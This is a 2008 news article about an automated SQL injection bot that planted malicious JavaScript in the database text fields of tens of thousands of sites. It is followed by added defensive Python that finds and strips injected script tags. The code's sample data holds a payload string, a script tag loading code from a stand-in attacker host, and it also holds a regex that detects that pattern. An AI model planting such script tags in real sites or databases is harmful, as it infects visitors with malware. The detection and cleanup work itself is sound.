SQL Injection Hitting Numerous Websites
David Utter Staff Writer
2008-01-10
Web applications have long been targets wherever injection flaws can be exploited, and one automated bot has now stepped up its SQL injection attacks.
In November 2007, the SANS ISC noted some instances of what appeared to be automated attacks against websites, where SQL injection served as the attack vector. The attack primarily targeted sites running on Microsoft IIS, with SQL Server operating on the back end.
ISC's Bojan Zdrnja wrote at ISC Incidents about the return of the automated SQL injection attacker, on a wider scale. It appears thousands of sites have been compromised by the attacker.
According to Ryan Barnett at ModSecurity, the attack is similar to the one that affected the Dolphin Stadium website before the last Super Bowl. Upwards of 70,000 websites have been compromised by this newest attack, which SANS blames on poorly secured web applications.
Barnett said the attack tries to inject malicious JavaScript into all the varchar and text fields of the database. The JavaScript then attempts to infect website visitors by exploiting unpatched browser vulnerabilities, likely to drop malware onto the system.
Web applications that fail to validate input because of poor coding by their programmers put both the site and its visitors at risk. Zdrnja thinks the people behind the attack will expand their bot to target sites running PHP and MySQL, another popular combination for web applications online.
Barnett suggested using Apache as a reverse proxy server as a front end to the application server. With ModSecurity and its Core Rules in place on the reverse proxy, Barnett said the SQL injection attack as documented would not have succeeded.
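The attack Barnett describes leaves a detectable trace: every varchar/text field of a compromised database ends up carrying the same externally sourced script tag. The following is an added example, not code from the article, SANS or ModSecurity, showing how a defender can enumerate a database's text columns, flag rows that contain an injected `<script src=...>` tag, and strip it. It assumes a constructed SQLite database standing in for the site's SQL Server back end, and the injected URL is a placeholder.

```python
import re
import sqlite3

# Placeholder standing in for the bot's real payload (a script tag pointing at
# a malware-serving host); the domain is a constructed example.
INJECTED = '<script src="http://attacker.example/ex.js"></script>'

def make_sample_db():
    """Constructed sample database: two tables, some rows already injected."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE articles(id INTEGER PRIMARY KEY, title VARCHAR(200), body TEXT);
        CREATE TABLE comments(id INTEGER PRIMARY KEY, author VARCHAR(50), msg TEXT, score INTEGER);
    """)
    # Parameterized inserts: the fix for the input-handling flaw the bot abuses.
    con.executemany("INSERT INTO articles(title, body) VALUES (?, ?)", [
        ("Welcome", "Hello world"),
        ("News" + INJECTED, "Body text" + INJECTED),
    ])
    con.executemany("INSERT INTO comments(author, msg, score) VALUES (?, ?, ?)", [
        ("alice", "nice post", 3),
        ("bob", "thanks" + INJECTED, 1),
    ])
    return con

def text_columns(con):
    """Yield (table, column) for every character/text column in the catalogue,
    i.e. exactly the column types the article says the bot wrote into."""
    tables = [r[0] for r in con.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")]
    for t in tables:
        # Identifiers come from the catalogue, not from user input.
        for _, name, ctype, *_ in con.execute(f"PRAGMA table_info('{t}')"):
            if ctype.upper().startswith(("VARCHAR", "NVARCHAR", "CHAR", "TEXT")):
                yield t, name

SCRIPT_RE = re.compile(r"<script[^>]*src=", re.IGNORECASE)

def find_injected_script(con):
    """Return sorted (table, column, rowid) triples whose stored text carries
    an externally sourced <script> tag, the signature of this attack."""
    hits = []
    for t, col in text_columns(con):
        for rowid, val in con.execute(f'SELECT rowid, "{col}" FROM "{t}"'):
            if isinstance(val, str) and SCRIPT_RE.search(val):
                hits.append((t, col, rowid))
    return sorted(hits)

def strip_injected_script(con):
    """Remove the injected tag from every flagged field; returns rows changed."""
    changed = 0
    for t, col, rowid in find_injected_script(con):
        val = con.execute(f'SELECT "{col}" FROM "{t}" WHERE rowid=?', (rowid,)).fetchone()[0]
        cleaned = re.sub(r"<script[^>]*src=[^>]*>\s*</script>", "", val, flags=re.IGNORECASE)
        con.execute(f'UPDATE "{t}" SET "{col}"=? WHERE rowid=?', (cleaned, rowid))
        changed += 1
    return changed
```

Cleaning the fields is only a stopgap; unless the concatenated queries are replaced with parameterized ones (or a ModSecurity-style front end blocks the requests), the bot simply reinfects the site on its next pass.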
About the Author:
David Utter is a business and technology writer for SecurityProNews and WebProNews.